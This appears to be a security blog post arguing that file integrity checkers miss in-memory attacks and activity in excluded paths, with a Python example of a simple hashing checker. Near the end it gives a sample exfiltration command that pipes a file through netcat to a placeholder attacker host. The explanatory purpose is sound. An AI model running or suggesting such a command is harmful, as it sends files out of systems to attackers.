I was talking with two prominent security professionals today, and the topic of integrity checking came up. It left me with some food for thought…
If you run full integrity checking on all your file systems, you will have good knowledge of which changes are made to your system: changed files, new files, deleted files and so on. But for common use, seeing every temporary file written to disk (say a PHP session), every temporary file created or changed once someone logs in, or log files that constantly get new content and therefore hash differently every time you md5/sha1 them, might be just too much… or, if you have the time, good for you.
That's why most file integrity checkers are “tuned” by default to ignore *something*. So there are places on the file system where files can hide from integrity checkers.
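A minimal checker of the kind described above, as an added illustration (not code from the original post): it hashes a directory tree, diffs two snapshots into added/deleted/changed, and shows that an excluded subtree such as a PHP session store is exactly the blind spot just mentioned. All paths and file contents are constructed in a temporary directory.

```python
import hashlib
import tempfile
from pathlib import Path


def hash_file(path):
    """SHA-256 of a file, read in chunks so large files need not fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(root, excludes=()):
    """Map relative path -> SHA-256 for every file under root, skipping excluded subtrees."""
    root = Path(root)
    result = {}
    for p in root.rglob("*"):
        if not p.is_file():
            continue
        rel = p.relative_to(root).as_posix()
        if any(rel == ex or rel.startswith(ex + "/") for ex in excludes):
            continue  # anything under an excluded path is invisible to the checker
        result[rel] = hash_file(p)
    return result


def compare(old, new):
    """Classify the difference between a baseline snapshot and a later one."""
    return {
        "added": sorted(set(new) - set(old)),
        "deleted": sorted(set(old) - set(new)),
        "changed": sorted(k for k in old.keys() & new.keys() if old[k] != new[k]),
    }


def demo():
    """Constructed scenario: take a baseline, simulate activity, compare."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "etc").mkdir()
        (root / "tmp" / "sessions").mkdir(parents=True)
        (root / "etc" / "passwd").write_text("root:x:0:0\n")
        (root / "tmp" / "sessions" / "sess_1").write_text("user=alice\n")
        excludes = ("tmp/sessions",)  # typical default tuning: ignore session files
        before = snapshot(root, excludes)
        (root / "etc" / "passwd").write_text("root:x:0:0\nmallory:x:0:0\n")  # changed
        (root / "etc" / "extra.conf").write_text("option=1\n")  # new, and reported
        (root / "tmp" / "sessions" / "sess_2").write_text("x\n")  # new, but not reported
        return compare(before, snapshot(root, excludes))
```

Running `demo()` reports `etc/passwd` as changed and `etc/extra.conf` as added, while the new file under the excluded session directory never appears; keep exclusions as narrow as possible for that reason.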
My point in all this is that a file integrity checker alone does not really give you any real insight into *bad things on your machine*. Why? Something might live only in memory… Take my last blog post as an example. That gives a shell on the system but leaves no new or changed files, except for the Apache log file 🙂 But every HTTP request changes that log file anyway, so integrity checking a live log file would not make much sense.
Say someone got a command shell on your machine. Running `cat somefile` would not by default trigger any normal integrity checker, and `cat somefile | nc evil-storage-machine.ru 80` would go just as unnoticed by a file integrity checker.
So you need something more…